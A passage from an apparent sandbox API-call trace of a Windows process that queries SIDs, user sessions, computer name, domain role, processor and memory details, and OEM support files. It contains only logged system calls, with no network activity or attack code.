[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.037] GetLengthSid (pSid=0xecd450*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 0x1c [0203.037] malloc (_Size=0x1c) returned 0xecd390 [0203.037] CopySid (in: nDestinationSidLength=0x1c, pDestinationSid=0xecd390, pSourceSid=0xecd450*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)) | out: pDestinationSid=0xecd390*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.037] free (_Block=0xecd450) [0203.038] free (_Block=0xe72930) [0203.038] IsValidSid (pSid=0xecd390*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.038] free (_Block=0x0) [0203.038] IsValidSid (pSid=0xecd390*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.038] GetLengthSid (pSid=0xecd390*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 0x1c [0203.038] malloc (_Size=0x1c) returned 0xecd360 [0203.039] CopySid (in: nDestinationSidLength=0x1c, pDestinationSid=0xecd360, pSourceSid=0xecd390*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)) | out: pDestinationSid=0xecd360*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.039] CloseHandle (hObject=0xa8c) returned 1 [0203.039] CloseHandle (hObject=0xfffffffffffffffe) returned 1 [0203.039] free (_Block=0xecd390) [0203.039] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0203.039] WTSEnumerateSessionsW (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x5ed358, pCount=0x5ed350 | out: ppSessionInfo=0x5ed358, pCount=0x5ed350) returned 1 [0203.041] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x1, WTSInfoClass=0x5, ppBuffer=0x5ed288, pBytesReturned=0x5ed340 | out: ppBuffer=0x5ed288*="OqXZRaykm", pBytesReturned=0x5ed340) returned 1 [0203.043] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x1, WTSInfoClass=0x7, ppBuffer=0x5ed290, pBytesReturned=0x5ed340 | out: ppBuffer=0x5ed290*="PXTHFFRYO7", pBytesReturned=0x5ed340) returned 1 [0203.044] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x1, WTSInfoClass=0x6, ppBuffer=0x5ed298, pBytesReturned=0x5ed340 | out: ppBuffer=0x5ed298*="Console", pBytesReturned=0x5ed340) returned 1 [0203.044] _wcsicmp (_String1="Console", _String2="Console") returned 0 [0203.045] LookupAccountNameW (in: lpSystemName="", lpAccountName="PXTHFFRYO7\\OqXZRaykm", Sid=0x0, cbSid=0x5ed180, ReferencedDomainName=0x0, cchReferencedDomainName=0x5ed218, peUse=0x5ed2c0 | out: Sid=0x0, cbSid=0x5ed180, ReferencedDomainName=0x0, cchReferencedDomainName=0x5ed218, peUse=0x5ed2c0) returned 0 [0203.046] GetLastError () returned 0x7a [0203.046] malloc (_Size=0x1c) returned 0xecd5a0 [0203.046] malloc (_Size=0x16) returned 0xec9680 [0203.047] LookupAccountNameW (in: lpSystemName="", lpAccountName="PXTHFFRYO7\\OqXZRaykm", Sid=0xecd5a0, cbSid=0x5ed180, ReferencedDomainName=0xec9680, cchReferencedDomainName=0x5ed218, peUse=0x5ed2c0 | out: Sid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), cbSid=0x5ed180, ReferencedDomainName="PXTHFFRYO7", cchReferencedDomainName=0x5ed218, peUse=0x5ed2c0) returned 1 [0203.048] GetSidIdentifierAuthority (pSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 0xecd5a2 [0203.048] GetSidSubAuthorityCount (pSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 0xecd5a1 [0203.048] GetSidSubAuthority (pSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), nSubAuthority=0x0) returned 0xecd5a8 [0203.048] GetSidSubAuthority (pSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), nSubAuthority=0x1) returned 0xecd5ac [0203.049] GetSidSubAuthority (pSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), nSubAuthority=0x2) returned 0xecd5b0 [0203.049] GetSidSubAuthority (pSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), nSubAuthority=0x3) returned 0xecd5b4 [0203.049] GetSidSubAuthority (pSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)), nSubAuthority=0x4) returned 0xecd5b8 [0203.049] malloc (_Size=0x18) returned 0xec9720 [0203.049] malloc (_Size=0x18) returned 0xec9820 [0203.049] malloc (_Size=0x18) returned 0xec9b20 [0203.050] free (_Block=0xec9680) [0203.050] IsValidSid (pSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.050] free (_Block=0x0) [0203.050] IsValidSid (pSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.050] GetLengthSid (pSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 0x1c [0203.050] malloc (_Size=0x1c) returned 0xecd600 [0203.050] CopySid (in: nDestinationSidLength=0x1c, pDestinationSid=0xecd600, pSourceSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)) | out: pDestinationSid=0xecd600*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.050] free (_Block=0xecd5a0) [0203.050] WTSFreeMemory (pMemory=0x4c0250) [0203.050] WTSFreeMemory (pMemory=0x4c06f0) [0203.050] WTSFreeMemory (pMemory=0x4c0930) [0203.050] WTSFreeMemory (pMemory=0x1742cf0) [0203.050] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7fffb3c5b160 [0203.050] free (_Block=0x0) [0203.050] IsValidSid (pSid=0xecd600*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.050] GetLengthSid (pSid=0xecd600*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 0x1c [0203.050] malloc (_Size=0x1c) returned 0xecd5a0 [0203.050] CopySid (in: nDestinationSidLength=0x1c, pDestinationSid=0xecd5a0, pSourceSid=0xecd600*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc)) | out: pDestinationSid=0xecd5a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xcc))) returned 1 [0203.051] free (_Block=0xecd600) [0203.051] free (_Block=0xecd5a0) [0203.051] free (_Block=0xec9b20) [0203.051] free (_Block=0xec9820) [0203.051] free (_Block=0xec9720) [0203.051] free (_Block=0xecd360) [0203.051] free (_Block=0xec9ca0) [0203.051] free (_Block=0xec9c00) [0203.051] free (_Block=0xec9d00) [0203.051] GlobalMemoryStatusEx (in: lpBuffer=0x5ed620 | out: lpBuffer=0x5ed620) returned 1 [0203.051] GetTimeZoneInformation (in: lpTimeZoneInformation=0x5ed0f0 | out: lpTimeZoneInformation=0x5ed0f0) returned 0x2 [0203.064] DevObjCreateDeviceInfoList () returned 0x4d3120 [0203.064] DevObjGetClassDevs () returned 0x1 [0203.065] DevObjEnumDeviceInfo () returned 0x0 [0203.065] DevObjDestroyDeviceInfoList () returned 0x1 [0203.065] GetSystemInfo (in: lpSystemInfo=0x5ed5b8 | out: lpSystemInfo=0x5ed5b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0203.065] GetLogicalProcessorInformationEx (in: RelationshipType=0x3, Buffer=0x0, ReturnedLength=0x5ed474 | out: Buffer=0x0, ReturnedLength=0x5ed474) returned 0 [0203.065] GetLastError () returned 0x7a [0203.065] malloc (_Size=0x30) returned 0xe72370 [0203.065] GetLogicalProcessorInformationEx (in: RelationshipType=0x3, Buffer=0xe72370, ReturnedLength=0x5ed474 | out: Buffer=0xe72370, ReturnedLength=0x5ed474) returned 1 [0203.065] GetActiveProcessorCount (GroupNumber=0xffff) returned 0x4 [0203.066] GetSystemMetrics (nIndex=67) returned 0 [0203.066] SafeArrayPutElement (psa=0x493590, rgIndices=0x5ed480, pv=0x5ed460) returned 0x0 [0203.066] SafeArrayPutElement (psa=0x493590, rgIndices=0x5ed480, pv=0x5ed460) returned 0x0 [0203.066] SafeArrayPutElement (psa=0x493590, rgIndices=0x5ed480, pv=0x5ed460) returned 0x0 [0203.066] SafeArrayPutElement (psa=0x493590, rgIndices=0x5ed480, pv=0x5ed460) returned 0x0 [0203.066] SafeArrayPutElement (psa=0x493590, rgIndices=0x5ed480, pv=0x5ed460) returned 0x0 [0203.066] SafeArrayPutElement (psa=0x493590, rgIndices=0x5ed480, pv=0x5ed460) returned 0x0 [0203.066] SafeArrayPutElement (psa=0x493590, rgIndices=0x5ed480, pv=0x5ed460) returned 0x0 [0203.066] SafeArrayPutElement (psa=0x493590, rgIndices=0x5ed480, pv=0x5ed460) returned 0x0 [0203.066] SafeArrayPutElement (psa=0x493590, rgIndices=0x5ed480, pv=0x5ed460) returned 0x0 [0203.066] SafeArrayPutElement (psa=0x493590, rgIndices=0x5ed480, pv=0x5ed460) returned 0x0 [0203.066] PowerDeterminePlatformRole () returned 0x1 [0203.066] PowerDeterminePlatformRoleEx (Version=0x2) returned 0x1 [0203.067] GetComputerNameExW (in: NameType=0x1, lpBuffer=0xe722bc, nSize=0x5ed160 | out: lpBuffer="pXTHffRyO7", nSize=0x5ed160) returned 1 [0203.069] SetEvent (hEvent=0x410) returned 1 [0203.069] free (_Block=0xea7d90) [0203.069] DsRoleGetPrimaryDomainInformation (in: lpServer=0x0, InfoLevel=0x1, Buffer=0x5ed170 | out: Buffer=0x5ed170*=0x1511e90*(MachineRole=0x0, Flags=0x0, DomainNameFlat="WORKGROUP", DomainNameDns=0x0, DomainForestName=0x0, DomainGuid.Data1=0x0, DomainGuid.Data2=0x0, DomainGuid.Data3=0x0, DomainGuid.Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0203.113] malloc (_Size=0x18) returned 0xec9780 [0203.113] SysStringLen (param_1="WORKGROUP") returned 0x9 [0203.114] free (_Block=0xec9780) [0203.114] DsRoleFreeMemory (Buffer=0x1511e90) [0203.114] NetServerGetInfo (in: servername=0x0, level=0x65, bufptr=0x5ed178 | out: bufptr=0x5ed178) returned 0x0 [0203.547] malloc (_Size=0x18) returned 0xec9940 [0203.547] SafeArrayPutElement (psa=0x493690, rgIndices=0x5ed130, pv=0x14d0d68) returned 0x0 [0203.547] free (_Block=0xec9940) [0203.547] malloc (_Size=0x18) returned 0xec9ac0 [0203.547] SafeArrayPutElement (psa=0x493690, rgIndices=0x5ed130, pv=0x4c2cf8) returned 0x0 [0203.548] free (_Block=0xec9ac0) [0203.548] malloc (_Size=0x18) returned 0xec9ca0 [0203.548] SafeArrayPutElement (psa=0x493690, rgIndices=0x5ed130, pv=0x4c2cf8) returned 0x0 [0203.548] free (_Block=0xec9ca0) [0203.548] SafeArrayRedim (in: psa=0x493690, psaboundNew=0x5ed0b0 | out: psa=0x493690) returned 0x0 [0203.548] NetApiBufferFree (Buffer=0x4aa260) returned 0x0 [0203.548] DsRoleGetPrimaryDomainInformation (in: lpServer=0x0, InfoLevel=0x1, Buffer=0x5ed168 | out: Buffer=0x5ed168*=0x1512c10*(MachineRole=0x0, Flags=0x0, DomainNameFlat="WORKGROUP", DomainNameDns=0x0, DomainForestName=0x0, DomainGuid.Data1=0x0, DomainGuid.Data2=0x0, DomainGuid.Data3=0x0, DomainGuid.Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0203.549] DsRoleFreeMemory (Buffer=0x1512c10) [0203.549] GetSystemDirectoryW (in: lpBuffer=0x5ecee0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.550] _itow (in: _Dest=0x1, _Radix=6212304 | out: _Dest=0x1) returned="1" [0203.550] RtlInitAnsiString (in: DestinationString=0x5ec870, SourceString=0x0 | out: DestinationString=0x5ec870) [0203.550] RtlInitUnicodeString (in: DestinationString=0x5ec890, SourceString=0x0 | out: DestinationString=0x5ec890) [0203.550] RtlInitAnsiString (in: DestinationString=0x5ec860, SourceString=0x0 | out: DestinationString=0x5ec860) [0203.550] RtlInitUnicodeString (in: DestinationString=0x5ec880, SourceString=0x0 | out: DestinationString=0x5ec880) [0203.550] RtlInitUnicodeString (in: DestinationString=0x5ec880, SourceString="Support Information" | out: DestinationString="Support Information") [0203.550] RtlInitUnicodeString (in: DestinationString=0x5ec890, SourceString="Line1" | out: DestinationString="Line1") [0203.550] RtlInitUnicodeString (in: DestinationString=0x5ec6c0, SourceString=0x0 | out: DestinationString=0x5ec6c0) [0203.550] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\system32\\OemInfo.Ini", NtPathName=0x5ec6c0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\system32\\OemInfo.Ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.550] NtOpenFile (in: FileHandle=0x5ec800, DesiredAccess=0x80100000, ObjectAttributes=0x5ec6d0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\system32\\OemInfo.Ini" (normalized: "c:\\windows\\system32\\oeminfo.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x5ec6b0, ShareAccess=0x7, OpenOptions=0x60 | out: FileHandle=0x5ec800*=0xffffffffffffffff, IoStatusBlock=0x5ec6b0*(Status=0x0, Pointer=0x0, Information=0x494298)) returned 0xc0000034 [0203.550] RtlFreeAnsiString (AnsiString="\\") [0203.550] RtlInitUnicodeString (in: DestinationString=0x5ec6c0, SourceString=0x0 | out: DestinationString=0x5ec6c0) [0203.550] CreateFileW (lpFileName="C:\\Windows\\system32\\OemLogo.Bmp" (normalized: "c:\\windows\\system32\\oemlogo.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xffffffffffffffff [0203.550] malloc (_Size=0x48) returned 0xea7ac0 [0203.550] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5ed098 | out: lpSystemTimeAsFileTime=0x5ed098*(dwLowDateTime=0x24d87ce, dwHighDateTime=0x1da9889)) [0203.551] SetEvent (hEvent=0x410) returned 1 [0203.551] free (_Block=0xe72370) [0214.478] LoadStringW (in: hInstance=0x7fffb3c00000, uID=0x3f, lpBuffer=0x5ed5e0, cchBufferMax=256 | out: lpBuffer="System Enclosure") returned 0x10 [0214.478] SafeArrayPutElement (psa=0x4930d0, rgIndices=0x5ed844, pv=0x5ed840) returned 0x0 [0225.345] LoadStringW (in: hInstance=0x7fffb3c00000, uID=0x3f, lpBuffer=0x5ed5e0, cchBufferMax=256 | out: lpBuffer="System Enclosure") returned 0x10 [0225.346] SafeArrayPutElement (psa=0x4930d0, rgIndices=0x5ed844, pv=0x5ed840) returned 0x0 [0357.939] SafeArrayAccessData (in: psa=0x4b0cf0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0357.939] memcpy (in: _Dst=0x159ea48, _Src=0x182f2b0, _Size=0x4 | out: _Dst=0x159ea48) returned 0x159ea48 [0357.939] SafeArrayUnaccessData (psa=0x4b0cf0) returned 0x0 [0357.939] SafeArrayAccessData (in: psa=0x4b0cf0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0357.939] memcpy (in: _Dst=0x159ea50, _Src=0x182f1f0, _Size=0x8 | out: _Dst=0x159ea50) returned 0x159ea50 [0357.939] SafeArrayUnaccessData (psa=0x4b0cf0) returned 0x0 [0357.939] SafeArrayAccessData (in: psa=0x4b12f0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0357.939] memcpy (in: _Dst=0x159ea5c, _Src=0x182f200, _Size=0x4 | out: _Dst=0x159ea5c) returned 0x159ea5c [0357.939] SafeArrayUnaccessData (psa=0x4b12f0) returned 0x0 [0357.939] SafeArrayAccessData (in: psa=0x4b12f0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0357.939] memcpy (in: _Dst=0x159ea64, _Src=0x182f120, _Size=0x4 | out: _Dst=0x159ea64) returned 0x159ea64 [0357.939] SafeArrayUnaccessData (psa=0x4b12f0) returned 0x0 [0357.973] SafeArrayAccessData (in: psa=0x4b14b0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0357.973] memcpy (in: _Dst=0x175a4a8, _Src=0x182eff0, _Size=0x4 | out: _Dst=0x175a4a8) returned 0x175a4a8 [0357.973] SafeArrayUnaccessData (psa=0x4b14b0) returned 0x0 [0357.973] SafeArrayAccessData (in: psa=0x4b14b0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0357.973] memcpy (in: _Dst=0x175a4b0, _Src=0x182efd0, _Size=0x8 | out: _Dst=0x175a4b0) returned 0x175a4b0 [0357.973] SafeArrayUnaccessData (psa=0x4b14b0) returned 0x0 [0357.974] SafeArrayAccessData (in: psa=0x4b14b0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0357.974] memcpy (in: _Dst=0x175a4bc, _Src=0x182f320, _Size=0x4 | out: _Dst=0x175a4bc) returned 0x175a4bc [0357.974] SafeArrayUnaccessData (psa=0x4b14b0) returned 0x0 [0357.974] SafeArrayAccessData (in: psa=0x4b1630, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0357.974] memcpy (in: _Dst=0x175a4c4, _Src=0x182f0b0, _Size=0x4 | out: _Dst=0x175a4c4) returned 0x175a4c4 [0357.974] SafeArrayUnaccessData (psa=0x4b1630) returned 0x0 [0358.001] SafeArrayAccessData (in: psa=0x4b17b0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.001] memcpy (in: _Dst=0x159ea48, _Src=0x182f240, _Size=0x4 | out: _Dst=0x159ea48) returned 0x159ea48 [0358.001] SafeArrayUnaccessData (psa=0x4b17b0) returned 0x0 [0358.001] SafeArrayAccessData (in: psa=0x4b1330, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.001] memcpy (in: _Dst=0x159ea50, _Src=0x182f0b0, _Size=0x8 | out: _Dst=0x159ea50) returned 0x159ea50 [0358.001] SafeArrayUnaccessData (psa=0x4b1330) returned 0x0 [0358.001] SafeArrayAccessData (in: psa=0x4b1330, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.001] memcpy (in: _Dst=0x159ea5c, _Src=0x182f1a0, _Size=0x4 | out: _Dst=0x159ea5c) returned 0x159ea5c [0358.001] SafeArrayUnaccessData (psa=0x4b1330) returned 0x0 [0358.001] SafeArrayAccessData (in: psa=0x4b1330, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.001] memcpy (in: _Dst=0x159ea64, _Src=0x182f1b0, _Size=0x4 | out: _Dst=0x159ea64) returned 0x159ea64 [0358.001] SafeArrayUnaccessData (psa=0x4b1330) returned 0x0 [0358.030] SafeArrayAccessData (in: psa=0x4b15b0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.030] memcpy (in: _Dst=0x175a4a8, _Src=0x182f100, _Size=0x4 | out: _Dst=0x175a4a8) returned 0x175a4a8 [0358.030] SafeArrayUnaccessData (psa=0x4b15b0) returned 0x0 [0358.030] SafeArrayAccessData (in: psa=0x4b15b0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.030] memcpy (in: _Dst=0x175a4b0, _Src=0x182f020, _Size=0x8 | out: _Dst=0x175a4b0) returned 0x175a4b0 [0358.030] SafeArrayUnaccessData (psa=0x4b15b0) returned 0x0 [0358.030] SafeArrayAccessData (in: psa=0x4b15b0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.030] memcpy (in: _Dst=0x175a4bc, _Src=0x182f200, _Size=0x4 | out: _Dst=0x175a4bc) returned 0x175a4bc [0358.030] SafeArrayUnaccessData (psa=0x4b15b0) returned 0x0 [0358.030] SafeArrayAccessData (in: psa=0x4b15b0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.030] memcpy (in: _Dst=0x175a4c4, _Src=0x182f100, _Size=0x4 | out: _Dst=0x175a4c4) returned 0x175a4c4 [0358.030] SafeArrayUnaccessData (psa=0x4b15b0) returned 0x0 [0358.296] SafeArrayAccessData (in: psa=0x15a6f60, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.296] memcpy (in: _Dst=0x17800d8, _Src=0x182f210, _Size=0x4 | out: _Dst=0x17800d8) returned 0x17800d8 [0358.296] SafeArrayUnaccessData (psa=0x15a6f60) returned 0x0 [0358.296] SafeArrayAccessData (in: psa=0x15a6f60, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.296] memcpy (in: _Dst=0x17800e0, _Src=0x182f110, _Size=0x8 | out: _Dst=0x17800e0) returned 0x17800e0 [0358.296] SafeArrayUnaccessData (psa=0x15a6f60) returned 0x0 [0358.296] SafeArrayAccessData (in: psa=0x15a6f60, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.296] memcpy (in: _Dst=0x17800ec, _Src=0x182efb0, _Size=0x4 | out: _Dst=0x17800ec) returned 0x17800ec [0358.296] SafeArrayUnaccessData (psa=0x15a6f60) returned 0x0 [0358.296] SafeArrayAccessData (in: psa=0x15a70a0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.296] memcpy (in: _Dst=0x17800f4, _Src=0x182f100, _Size=0x4 | out: _Dst=0x17800f4) returned 0x17800f4 [0358.297] SafeArrayUnaccessData (psa=0x15a70a0) returned 0x0 [0358.342] SafeArrayAccessData (in: psa=0x15a66a0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.342] memcpy (in: _Dst=0x17800d8, _Src=0x182f150, _Size=0x4 | out: _Dst=0x17800d8) returned 0x17800d8 [0358.342] SafeArrayUnaccessData (psa=0x15a66a0) returned 0x0 [0358.342] SafeArrayAccessData (in: psa=0x15a66a0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.342] memcpy (in: _Dst=0x17800e0, _Src=0x182f180, _Size=0x8 | out: _Dst=0x17800e0) returned 0x17800e0 [0358.342] SafeArrayUnaccessData (psa=0x15a66a0) returned 0x0 [0358.342] SafeArrayAccessData (in: psa=0x15a66a0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.342] memcpy (in: _Dst=0x17800ec, _Src=0x182f220, _Size=0x4 | out: _Dst=0x17800ec) returned 0x17800ec [0358.342] SafeArrayUnaccessData (psa=0x15a66a0) returned 0x0 [0358.342] SafeArrayAccessData (in: psa=0x15a6820, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.342] memcpy (in: _Dst=0x17800f4, _Src=0x182f0b0, _Size=0x4 | out: _Dst=0x17800f4) returned 0x17800f4 [0358.342] SafeArrayUnaccessData (psa=0x15a6820) returned 0x0 [0358.388] SafeArrayAccessData (in: psa=0x15a6620, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.388] memcpy (in: _Dst=0x17800d8, _Src=0x182f130, _Size=0x4 | out: _Dst=0x17800d8) returned 0x17800d8 [0358.388] SafeArrayUnaccessData (psa=0x15a6620) returned 0x0 [0358.388] SafeArrayAccessData (in: psa=0x15a70a0, ppvData=0x5ed570 | out: ppvData=0x5ed570) returned 0x0 [0358.388] memcpy (in: _Dst=0x17800e0, _Src=0x182f350, _Size=0x8 | out: _Dst=0x17800e0) returned 0x17800e0 [0358.388] SafeArrayUnaccessData (psa=0x15a70a0) returned 0x0 [0358.389] SafeArrayAccessData 